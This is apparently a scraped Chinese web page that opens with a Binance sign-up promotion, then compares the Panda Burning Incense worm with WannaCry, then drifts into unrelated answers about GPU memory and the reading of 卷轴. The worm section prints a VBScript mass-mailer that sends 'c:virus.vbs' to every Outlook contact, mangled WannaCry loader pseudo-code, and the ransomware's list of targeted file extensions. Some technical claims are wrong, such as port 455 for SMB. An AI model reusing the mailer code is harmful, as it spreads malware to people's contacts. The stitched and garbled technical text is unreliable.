币安下载

Binance币安交易所

全球最大加密货币交易所,注册100%可领取100USDT奖励!通过本站注册不仅可以享受手续费折扣同时有机会获得币安周边

点击注册 更多线路

更多交易所入口

一站式注册各大交易所、点击进入加密世界、永不失联,币安Binance/欧易OKX/GATE.IO芝麻开门/Bitget/抹茶MEXC/火币Huobi

点击进入 永不失联

btc好了吗


电脑病毒比拼,比特币和熊猫烧香有哪些相似与不同?


                

近年来的病毒,这里特指蠕虫病毒。


Stuxnet蠕虫,MS10-061,当蠕虫值入机器后,把自己设置成开机自启动,并释放驱动文件,把该驱动设置为服务自启动。该驱动负责突破系统TCP半开连接数限制,以方便蠕虫通过网络传播。感染系统的可移动驱动器(即U盘等),可通过U盘传播自身。通过MS10-061打印机服务远程代码执行漏洞在局域网传播自身。并尝试利用一些弱口令企图猜解并取得主机权限,危及整个网络的安全。为计算机设置了一个后门,不断尝试连接远程黑客服务器,收集用户信息,接收黑客指令,并可获取黑客远程服务器木马并执行,带来严重安全隐患。


熊猫烧香对我来说有点久远,虽然我有初始的蠕虫病毒,但没有解析关键的代码,只从网络中找到说是变了50次的变种一部分。


?Set?objOA=Wscript.CreateObject("Outlook.Application")


创建一个OUTLOOK应用的对象


Set objMapi=objOA.GetNameSpace("MAPI")


取得MAPI名字空间?For?i=1?to?objMapi.AddressLists.Count??遍历地址簿


?Set?objAddList=objMapi.AddressLists(i)For?j=1?To?objAddList.?AddressEntries.Count??


Set?objMail=objOA.CreateItem?(0)objMail.Recipients.Add?(objAddList.?AddressEntries?(j)


取得收件人邮件地址


?objMail.Subject="?你好!"??


设置邮件主题


objMail.Body="这次给你的附件,是我的新文档!"??


设置信件内容


objMail.Attachments.Add(“c:virus.vbs")


把自己作为附件扩散出去


objMail.Send??


发送邮件


Next??


Next??


Set?objMapi=Nothing??


Set?objOA=Nothing??


这块是源码的传播方式,其实是劫持了邮箱的账号密码,自动发送邮件给好友,其实附件带的就是病毒复制体了。与最近的比特币病毒相关的也只有在局域网中通过455端口迅速感染。


它的感染方式主要是通过下载,病毒会删除ghost文件,并对文档的图片进行更换,不会对文件造成损坏。


而比特币病毒不同。



WannaCry木马利用泄漏的方程式工具包中的“永恒之蓝”漏洞工具从MS17_010漏洞进行网络端口(455端口)扫描攻击,目标机器被成功攻陷后会从攻击机下载WannaCry木马进行感染,并作为攻击机再次扫描互联网和局域网其他机器,行成蠕虫感染大范围超快速扩散。


木马母体为mssecsvc.exe,运行后会扫描随机ip的互联网机器,尝试感染,也会扫描局域网相同网段的机器进行感染传播,此外会释放敲诈者程序tasksche.exe,对磁盘文件进行加密勒索。


V1=0;


Do


{


P_payload=&payload_x86;


If(v1)


P_payload=&payload_x64;


V3=*(void **)&FileName[4*v1=260];


(&v11+v1)=(int)v3;


memcpy(v3,p_payload,v1!=0?51364:16480);


*(&v11+v1)+=v1!=0?513634:16480;


++v1


}


While(v1

V4+CreateFileA(FileName,0*8000000u,1u,03u,4u,0);


这个就是利用MS17_010的数据了,这个锅只能背给不更新补丁的人了。


木马加密使用AES加密文件,并使用非对称加密算法RSA 2048加密随机密钥,每个文件使用一个随机密钥,下面就是密码学的概率了,就和当初二战时期德军的恩尼格玛密码机一样,每一天的密码算法是天文数字,除非得到密钥,其余不可能破解。



熊猫烧香是不会损害文件的,但这个是可以的。


.doc, .docx, .xls, .xlsx, .ppt, .pptx, .pst, .ost, .msg, .eml, .vsd, .vsdx, .txt, .csv, .rtf, .123, .wks, .wk1, .pdf, .dwg, .onetoc2, .snt, .jpeg, .jpg, .docb, .docm, .dot, .dotm, .dotx, .xlsm, .xlsb, .xlw, .xlt, .xlm, .xlc, .xltx, .xltm, .pptm, .pot, .pps, .ppsm, .ppsx, .ppam, .potx, .potm, .edb, .hwp, .602, .sxi, .sti, .sldx, .sldm, .sldm, .vdi, .vmdk, .vmx, .gpg, .aes, .ARC, .PAQ, .bz2, .tbk, .bak, .tar, .tgz, .gz, .7z, .rar, .zip, .backup, .iso, .vcd, .bmp, .png, .gif, .raw, .cgm, .tif, .tiff, .nef, .psd, .ai, .svg, .djvu, .m4u, .m3u, .mid, .wma, .flv, .3g2, .mkv, .3gp, .mp4, .mov, .avi, .asf, .mpeg, .vob, .mpg, .wmv, .fla, .swf, .wav, .mp3, .sh, .class, .jar, .java, .rb, .asp, .php, .jsp, .brd, .sch, .dch, .dip, .pl, .vb, .vbs, .ps1, .bat, .cmd, .js, .asm, .h, .pas, .cpp, .c, .cs, .suo, .sln, .ldf, .mdf, .ibd, .myi, .myd, .frm, .odb, .dbf, .db, .mdb, .accdb, .sql, .sqlitedb, .sqlite3, .asc, .lay6, .lay, .mml, .sxm, .otg, .odg, .uop, .std, .sxd, .otp, .odp, .wb2, .slk, .dif, .stc, .sxc, .ots, .ods, .3dm, .max, .3ds, .uot, .stw, .sxw, .ott, .odt, .pem, .p12, .csr, .crt, .key, .pfx, .der


这些都是病毒会攻击的文档后缀。


和熊猫不同的是,它会通过tor匿名,监听9050端口,通过本地代理通信实现与服务器连接。


到底该怎么识别显卡


                
用GPU-Z可以识别出真实频率
现在ATI和NV都不厚道,ATI的HM技术,NV的TC技术,都是扩展本身内存作为显存的技术,非常鸡肋
其实很好识别,显卡上面有显存颗粒的,数下个数,看下每颗显存颗粒是多少MB的,一乘就算出来了
还有,TPY,中关村,泡泡,硬派都有产品库,你去看产品参数就可以看出来真实显存是多少了

山水卷轴画的卷的读音是什么?


                
卷轴juàn zhóu
指裱好带轴的书画等。

目录[+]